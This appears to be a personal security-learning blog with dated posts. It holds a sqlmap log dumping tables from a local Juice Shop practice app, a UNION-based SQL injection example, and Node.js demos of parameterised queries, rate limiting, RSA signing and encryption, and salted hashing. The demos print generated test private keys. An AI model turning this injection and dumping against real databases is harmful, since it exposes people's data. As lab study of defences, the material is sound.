[23:07:37] [INFO] fetching entries for table 'Memories'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Memories' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'sqlite_sequence'
[23:07:37] [INFO] fetching entries for table 'sqlite_sequence'
Database: <current>
Table: sqlite_sequence
[17 entries]
+-----+-------------------+
| seq | name |
+-----+-------------------+
| 14 | SecurityQuestions |
| 20 | Users |
| 19 | SecurityAnswers |
| 6 | Addresses |
| 6 | Cards |
| 8 | Feedbacks |
| 100 | Challenges |
| 44 | Products |
| 5 | Baskets |
| 8 | BasketItems |
| 1 | Complaints |
| 9 | Recycles |
| 44 | Quantities |
| 20 | Wallets |
| 3 | Deliveries |
| 5 | Memories |
| 2 | Captchas |
+-----+-------------------+
[23:07:37] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/sqlite_sequence.csv'
[23:07:37] [INFO] fetching columns for table 'Baskets'
[23:07:37] [INFO] fetching entries for table 'Baskets'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Baskets' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'PrivacyRequests'
[23:07:37] [INFO] fetching entries for table 'PrivacyRequests'
[23:07:37] [WARNING] unable to retrieve the entries for table 'PrivacyRequests' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'Challenges'
[23:07:37] [INFO] fetching entries for table 'Challenges'
[23:07:40] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:40] [WARNING] unable to retrieve the entries for table 'Challenges' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Complaints'
[23:07:40] [INFO] fetching entries for table 'Complaints'
[23:07:40] [WARNING] unable to retrieve the entries for table 'Complaints' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Quantities'
[23:07:40] [INFO] fetching entries for table 'Quantities'
Database: <current>
Table: Quantities
[12 entries]
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| id | ProductId | quantity | updatedAt | createdAt | limitPerUser |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| 1 | 1 | 69 | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5 |
| 5 | 5 | 71 | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5 |
| 7 | 7 | 48 | 2022-01-25 02:53:33.859 +00:00 | 2022-01-25 02:53:33.859 +00:00 | 5 |
| 20 | 20 | 5 | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5 |
| 24 | 24 | 35 | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5 |
| 33 | 33 | 3 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
| 38 | 38 | 0 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
| 39 | 39 | 51 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 5 |
| 40 | 40 | 2 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
| 41 | 41 | 1 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
| 43 | 43 | 3 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
| 44 | 44 | 38 | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1 |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
[23:07:41] [INFO] table 'SQLite_masterdb.Quantities' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Quantities.csv'
[23:07:41] [INFO] fetching columns for table 'Products'
[23:07:41] [INFO] fetching entries for table 'Products'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Products' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Deliveries'
[23:07:42] [INFO] fetching entries for table 'Deliveries'
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] unable to retrieve the entries for table 'Deliveries' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Captchas'
[23:07:42] [INFO] fetching entries for table 'Captchas'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Captchas' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Cards'
[23:07:42] [INFO] fetching entries for table 'Cards'
[23:07:43] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:43] [WARNING] unable to retrieve the entries for table 'Cards' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'BasketItems'
[23:07:43] [INFO] fetching entries for table 'BasketItems'
[23:07:43] [WARNING] unable to retrieve the entries for table 'BasketItems' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'SecurityAnswers'
[23:07:43] [INFO] fetching entries for table 'SecurityAnswers'
[23:07:43] [WARNING] unable to retrieve the entries for table 'SecurityAnswers' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'Feedbacks'
[23:07:43] [INFO] fetching entries for table 'Feedbacks'
Database: <current>
Table: Feedbacks
[3 entries]
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | UserId | 255 | rating | comment | updatedAt | createdAt |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1 | 1 | 255 | 5 | I love this shop! Best products in town! Highly recommended! (***in@juice-sh.op) | 2022-01-25 02:53:33.307 +00:00 | 2022-01-25 02:53:33.307 +00:00 |
| 2 | 2 | 255 | 4 | Great shop! Awesome service! (***@juice-sh.op) | 2022-01-25 02:53:33.310 +00:00 | 2022-01-25 02:53:33.310 +00:00 |
| 3 | 3 | 255 | 1 | Nothing useful available here! (***der@juice-sh.op) | 2022-01-25 02:53:33.312 +00:00 | 2022-01-25 02:53:33.312 +00:00 |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
[23:07:44] [INFO] table 'SQLite_masterdb.Feedbacks' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Feedbacks.csv'
[23:07:44] [INFO] fetching columns for table 'Users'
[23:07:44] [INFO] fetching entries for table 'Users'
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] unable to retrieve the entries for table 'Users' in database 'SQLite_masterdb'
[23:07:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 359 times
[23:07:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[*] ending @ 23:07:44 /2022-01-24/
reference:
Sunday, January 23, 2022
Saturday, January 22, 2022
sql injection union command
SELECT *FROM sqlinjection.login
WHERE id=1
UNION SELECT * FROM sqlinjection.login;
data leaked by union command
sql injection with union command in search query to obtain table columns info
search found bob
sql injection with union command failed
//index.js
const express = require('express')
const app = express()
const port = 8080
var bodyParser = require('body-parser')
app.use(bodyParser.json()); // to support JSON-encoded bodies
app.use(bodyParser.urlencoded({ // to support URL-encoded bodies
extended: true
}));
var mysql = require('mysql')
var connection = mysql.createConnection({
host: '127.0.0.1',
user: 'dvwa',
password: 'p@ssw0rd',
database: 'sqlinjection'
})
connection.connect()
//render html
app.set('view engine', 'ejs');
app.engine('html', require('ejs').renderFile);
app.get('/', function (req, res) {
res.render('index');
});
app.all('/search/', function (req, res) {
if (!req.query.q) {
res.render('index');
}
else {
connection.query('SELECT * from login where name = ?', [req.query.q], function (err, rows, fields) {
if (err) throw err
res.send(rows);
})
}
});
app.listen(port, () => {
console.log(`Example app listening at http://localhost:${port}`)
})
reference:
prevention:
- Do not concatenate the SQL query strings. This is where the hackers will manipulate the SQL query to expose data. So never do the concatenate on SQL query.
- Always use the Prepared Statement approach( Question mark approach).
- The advantage of using the question mark is, it will match the data comparison with only the particular column. Even the hackers modify the input, the modified input value will be compared with only one column. So it does not expose the data.
Friday, January 21, 2022
Thursday, January 20, 2022
Wednesday, January 19, 2022
limit repeated requests to public APIs
if requests are more than limits, server will block request
limt, limit remaining, and limit reset time are in response headers
if multiple users are online, current user limit won't be affected by others'
usage is tracked by ip address
//index.js
const express = require('express')
const rateLimit = require('express-rate-limit')
const app = express()
const PORT = 3000
// Create the rate limit rule
const apiRequestLimiter = rateLimit({
windowMs: 1 * 60 * 1000, // 1 minute
max: 3 // limit each IP to 3 requests per windowMs
})
// Use the limit rule as an application middleware
app.use(apiRequestLimiter)
app.get('/', function (req, res) {
return res.send('Hello World')
})
app.listen(PORT, () => {
console.log(`server started on port ${PORT}`)
})
reference:
Tuesday, January 18, 2022
RSA signature
node sign.js
218b07f509cfdb16d3977faac6906fe43687278e3e8ddf639fe9af1d4f3304c34c029702579ce605712dd4bf237534a7e448f8fd27bf55b8e2cb43b328893df141fff702d3066b029008a726ebec33745c725f5a31f128b3c21f8ba8d921e61e110ce347f2f1f9475bd92bb828a12fae5eb3a1b2e86e969346b7b0c25272214721e211262aa7ad8b11fc0b260ce734557076735e9a06893a3a7538be6c0fabd76ea359bba11fafbfaaa1bfa4bbe066bac9cd65e7d5e092720f359b12abdf37d3e5f5a4cc1f9090de03b0e8898dbc21847f533a44f0b5e1873f12effe1c3aaeba8eb975216721cc4d2d68366e390a2af9ff43392d58e25909f0cffb4def58f902
Verified: true
//sign.js
const { createSign, createVerify } = require('crypto');
const { publicKey, privateKey } = require('./keypair');
const message = 'this data must be signed';
/// SIGN
const signer = createSign('rsa-sha256');
signer.update(message);
const signature = signer.sign(privateKey, 'hex');
console.log(signature);
/// VERIFY
const verifier = createVerify('rsa-sha256');
verifier.update(message);
const isVerified = verifier.verify(publicKey, signature, 'hex');
console.log(`Verified: ${isVerified}`)
reference:
Monday, January 17, 2022
Sunday, January 16, 2022
salt in encryption
salt add randomness to hashing. The hashing dictionary for known encryption algorithm won't work for cracking hashing with salt added. salt and password hashes are stored in database, which are separated by :.
PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node salt.js
{
email: 'bob@gmail.com',
password: '5b0caa7a0764e99a1ca2472e72e8cf5c:87d3f6b38f2ce30423bdaf9bc1dfe80329fce6c5ff061d040a8d59f369ba49178022833abdf1c88debb4b133ba085724a0379fcf608889395401e058c7c044cd'
}
login success!
login fail!
PS C:\Users\zchen\Programming\node-crypto-examples-main\src>
//salt.js
const { scryptSync, randomBytes, timingSafeEqual } = require('crypto');
const users = []
function signup(email, password) {
const salt = randomBytes(16).toString('hex');
const hashedPassword = scryptSync(password, salt, 64).toString('hex');
const user = { email, password: `${salt}:${hashedPassword}` }
users.push(user);
return user
}
function login(email, password) {
const user = users.find(v => v.email === email);
const [salt, key] = user.password.split(':');
const hashedBuffer = scryptSync(password, salt, 64);
const keyBuffer = Buffer.from(key, 'hex');
const match = timingSafeEqual(hashedBuffer, keyBuffer);
if (match) {
return 'login success!'
} else {
return 'login fail!'
}
}
const newUser = signup('bob@gmail.com', '12345')
console.log(newUser)
const try1 = login('bob@gmail.com', '12345')
console.log(try1)
const try2 = login('bob@gmail.com', '123')
console.log(try2)
reference:
Saturday, January 15, 2022
RSA encryption
public and private key pair change everytime message is sent. encrypt with public key and decrypt with private key.
PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node .\asymmetric-encrypt.js
public key: -----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0luzMXYhpLCttFV3GBEK
J8vtPmaO4l8K6LlRMWRikSK3yWGlTlhBDlYhsBztebzT0n2eI7F2luXgozVWgE0I
iHyj4PaVek3lR1iJPK9wzg5VVtPGDDCWdW86i7XJZB7QcRa74gjAIeaUD/m0gK8t
USBt9Q1Z+tkT921mswsbLlS8pytzfm4DOhHnBhoJ93UZHx/LAHU7JrA6GHBtNnb0
p47lWkMN4K7KMFTB4uMht/ZSx+ciFzzKdZVItEvcUXFdDEoUkyXz03UvXe6yirFs
RSLqw5c5VFrDddBwPkHquvLvtj992TB1Hb5rU4R4ewir2AUHtww6E0FfWesSXYLw
NQIDAQAB
-----END PUBLIC KEY-----
private key: -----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDSW7MxdiGksK20
VXcYEQony+0+Zo7iXwrouVExZGKRIrfJYaVOWEEOViGwHO15vNPSfZ4jsXaW5eCj
NVaATQiIfKPg9pV6TeVHWIk8r3DODlVW08YMMJZ1bzqLtclkHtBxFrviCMAh5pQP
+bSAry1RIG31DVn62RP3bWazCxsuVLynK3N+bgM6EecGGgn3dRkfH8sAdTsmsDoY
cG02dvSnjuVaQw3grsowVMHi4yG39lLH5yIXPMp1lUi0S9xRcV0MShSTJfPTdS9d
7rKKsWxFIurDlzlUWsN10HA+Qeq68u+2P33ZMHUdvmtThHh7CKvYBQe3DDoTQV9Z
6xJdgvA1AgMBAAECggEAHOdmttwhgUyZgZbgt1jYCWHW5mUXKvmeOR4FjwDZHlIj
6LLXEO3Fep/RHy7KXpjYjiqeiQ8AWXmapTJWAWkUTBS8O9QF8/kyENyUdtcwa8/C
YBzXMKOYeOhgpgPDeVNWlsNl64gCRmY1YACSkcAAPQ50rWA5ReN//9ZzbxSOlo3k
KrG84lwUSdeKiAzjFIbg9rHRgoF5CCnBTjKG1IPrncwJGLNRWPiXO4UzQ6Ia6pO7
gFgEdWGG6Z6GzGt37/SAHAsMc/VUjrRLRgokHvvvjuu5XMbHpLxN+yngOram62dl
pWTTXpP8FRE2i+9k4n+NT+9LhVA5uSQ9BdpGxhGtoQKBgQD64Z41na/pr5pMe1cQ
JcI3OlR2tx84PGWqB8xVnfxSjdJ/1nh7BO+hMFrm9FvRxAQHTMiffnBcryO11v81
TOxtBdJK0Gw157srA+x10zTeZCQSMzUeu1hYEyUhe0CNARL/zNlRNcU+oQYZ3O9l
t1JrPL153q0eDb9GxJPHzbDMOQKBgQDWpmzRDN1o4zKnUXAEcI8pfTwg2Y4V+QX6
wlMnr18GdjIfY4qbmy/fvHIWCiaVGbWux7DzpXMgRkZZquNJIltfgclzFNyxx+Hf
5YZXLiVnrMOXtDpKtnaHtynGixbs62q5csgIUtBCBxouPGP7bXm0aTpSYjNp4I1S
F4kjJl273QKBgQDIjLTw/UXTU7nPq8U0Nkrj5TAB2m8NgFJwsl0oj+tVfuOnp6WW
CaMZQlNYTjxcGgpyX3H89ZEStjqgsOZAEGbq2/14KtZl3QGk6DUNFzIrGPgwyFiN
YYvElEFZW3KFhTdP3sxV+9raLtR2tkN1Fy++Y8a/dj8DSFAAXUIZNZdAGQKBgQC0
e5EpobiVldukhjw6723gw9WIBYWMAiw98aE70CCFbWKts+P6/NyfMnN3Bqf0XH7A
bFXkN+x6abyDbsXXW5Ua1CVPp2396gSJXxO7QCjhaIm5iCgvZAZ8DM2KjK8FHNlK
/zEkloVXz2L7F3o2EZHw2T3ZwYpbbx1Etldv/7V23QKBgG1pRjJ9Ut9UV3RYEoL/
Wq5wjNnQnaipjbz4VKYZ4MDWhLCkFePE2fmnskDeWyC28hX8hcyn5EyZoL7JMXt6
0k6OtXLnclAoJW53Yo+xIAnOZJq42yMk3c1sHfrropi84iC8f7xrCdj0iu23+dlI
oxCbxeFq5Jct3nZ98K9dSlfV
-----END PRIVATE KEY-----
encryption: 6aa45b77a87ec83dead6f020773f8dbbd43ab32973f79b6680c3e773a8934af8591261dfa19aba0cb99746115af84dc0e83cf5a7b47f83b226e9e4c9fb23b67187bfd82d52f43fa42b301e362571c4dfa20cdbc8fb0e58fd21ba5be14ef51622ab213617de6d0e97fe81587de2296895b87eea850653cc39828dec88ed24366e1bb1b1c85cd0f9173a1c96e152b77038e618fda2a71a979915ba09701572a86fd35a5c35ee9e273e4a435c47234bedd214868e7ea593e9a9084d3b340d2f92a965c740804fb6e9ab2e842ce0bd950411521cac0f741b26135b7e259722a061152157496ef84579a3fd400a822d12438dab9129c53593882672ecbd38f69b00b5
decryption: the british are coming!
PS C:\Users\zchen\Programming\node-crypto-examples-main\src> node .\asymmetric-encrypt.js
public key: -----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtRXqrm+JSuiqlMyS3ypk
2toXMlsuWxzg3vJWvvS1l/ijdTrsYRbE4JdQC218uG9nmMcLRtiF3C1GDDQDNkCK
mqOsniqEX87brXwD3kPc95dS0UoKYwRahxp4+8bEJd2lXXU/2GzH1B8oebFC640J
tZlrTdgcivM/qzArd8ai4j/Lv/UE89t5L3tDA9Vv8aJyoTYtKIv0g6iJG8jDYUxP
QSh6yZFySSkXdkAYGgJOaleRh05BektrDcLRUhCHMd4Y3RhvvKG7mCwGM2kwnNII
xIonaJmyM4RsjltP81uyclGmCI6RKVgoyeZlOteFe8tRCNjfQneZJQYDrENfQ+s6
cQIDAQAB
-----END PUBLIC KEY-----
private key: -----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC1Fequb4lK6KqU
zJLfKmTa2hcyWy5bHODe8la+9LWX+KN1OuxhFsTgl1ALbXy4b2eYxwtG2IXcLUYM
NAM2QIqao6yeKoRfztutfAPeQ9z3l1LRSgpjBFqHGnj7xsQl3aVddT/YbMfUHyh5
sULrjQm1mWtN2ByK8z+rMCt3xqLiP8u/9QTz23kve0MD1W/xonKhNi0oi/SDqIkb
yMNhTE9BKHrJkXJJKRd2QBgaAk5qV5GHTkF6S2sNwtFSEIcx3hjdGG+8obuYLAYz
aTCc0gjEiidombIzhGyOW0/zW7JyUaYIjpEpWCjJ5mU614V7y1EI2N9Cd5klBgOs
Q19D6zpxAgMBAAECggEACnHNK2p7fLqWvCZggkarsoPJurnPnqm3vqQzpKfwoWdR
5j0TzTXG/T08/Ku/+dNTIli4qclrTxu9Yo7NcJ+gXvL5zdWd9Pi1avgwMO2xHQa5
XCDtIHDr18cLG1qHjbePBijxGcaMcAusBfjXZ0anPLYwnjjMzKbjETiiCTKHyozS
lxE0aSKpQLBHRaiiEbbpva5Ao5OKY4+bR89Jij1wlGn0fj1YCDT6qpoPF4xlvFPb
8WSwthot3kp0JRMEHiK8UVJDvecZms/wOnl17o9ZnbO0ouTeBEL9ZWU+fWc7Ls5Y
/EgxT71VrKxytppU8vtQiHvdNPJj/Z0iK+IBblUVwQKBgQDdIXoHoQTWZIBFOEtr
9QCddEtAW4Sv8bqtTgrCwCpN9l1s3cgk3p+ErjsjwqwIbIy6+PwV0rNINGfM1yum
KiqhpK9QEBYTgNjGirUhKpAtNO8rksSds4FlWbgwvJkwt7CpsCrQh+rPEj4LCxRM
wP6zS15JcVkeo0i4dRzglWry1QKBgQDRo+mNSJtrCBmbDnUsu9IW9rz8Y6Lm5lCL
YtV6s5+C7W6dwWbP4no1WXF4bmXmCzqzhmwIylg0slL/GBKUjvUgzLBMXHAO50V/
bYhrAkn5BItiVILvlM2Mdkl2Q6V7FubkU/m5DMuHF67lOOcCu1K+iFsL38ZfaqMH
9qoQIbvfLQKBgQC7Q7pf85BxLzMha4cTqawXq4B+xAIeLgv07/5U5v/sfhKoOzlf
X9ifOB2FLzsY9zRGssxofsKtBxRQeHfShCsOMLT2jGjlo1vw5051A+KNJiLVN7mi
A341IkHFpDHm++h0C2h2qGPFcKFyILPUPCx2EgGLGJ5sP8M50pPd7Stg8QKBgQC6
v+aUykJQ9VVCEH4HTIVZmZE+0E9Um4TStkdv18VX78SjWZ8JvzmYfsYbP1UcuZIg
TLW+muo6f0R6I+qhVjw9bLn8PDhCvnjljCCDGvXkk8zK2ngNjqQQ5WqJpLcsUHl8
muYRl7lS7aEKZ0c64r5SJsvcZwqjAy6aMHzMhBCFPQKBgDlkG4ramWbIuYQSARz+
OKfNdILwLtAnRS32MPhFMdljyh8Ipwa+cGxeYbnINUWNEyFT8S+6ZIYPWvbu3YqN
9QLik8NqGGskC9Ut8htUCz6Q9HL0ICZHFiD6QkOesN41dG7AWW9tag5bqMm5WLOH
keZ5m0YEMeuTAYcHdW6KUVOn
-----END PRIVATE KEY-----
encryption: b2405679353cd61a19659834bae0fd21318983c229f2bed5745441ed55569051f705253d28ea9bdd4252c9733eb14534a4f114ef0dede6091438672b90cb18b081448b4421070a3d20991d3885433d410e4aba0871fe356759fca2a80b9920866bb4e32c99eb25174b391813d68aead98e5500d41386338f273d881276f1bdb4f874120f23d120718100fc2623fb9534ad309f1009a59f2ba68225710491bdb45483fefc780e9ea048d8775f58d56c96370d195dc9faed39161576bc1f3ad47ced5111a01032eae0a7a78e8afde457c1d054cfe34c6a496a8276997cc609ef7cf6f7209321c7df6c03a4cd2af283dcee17f481c9757fecd543586d41d6c8dda6
decryption: the british are coming!
------------------------------
//asymmetric-encrypt.js
const { publicEncrypt, privateDecrypt } = require('crypto');
const { publicKey, privateKey } = require('./keypair');
const message = 'the british are coming!'
const encryptedData = publicEncrypt(
publicKey,
Buffer.from(message)
);
console.log('public key: ', publicKey)
console.log('private key: ', privateKey)
console.log('encryption: ', encryptedData.toString('hex'))
const decryptedData = privateDecrypt(
privateKey,
encryptedData
);
console.log('decryption: ', decryptedData.toString('utf-8'));
--------------------------------
//keypair.js
const { generateKeyPairSync } = require('crypto');
const { privateKey, publicKey } = generateKeyPairSync('rsa', {
modulusLength: 2048, // the length of your key in bits
publicKeyEncoding: {
type: 'spki', // recommended to be 'spki' by the Node.js docs
format: 'pem',
},
privateKeyEncoding: {
type: 'pkcs8', // recommended to be 'pkcs8' by the Node.js docs
format: 'pem',
// cipher: 'aes-256-cbc',
// passphrase: 'top secret'
},
});
// console.log(publicKey);
// console.log(privateKey);
module.exports = {
privateKey, publicKey
}
reference:
Subscribe to:
Posts (Atom)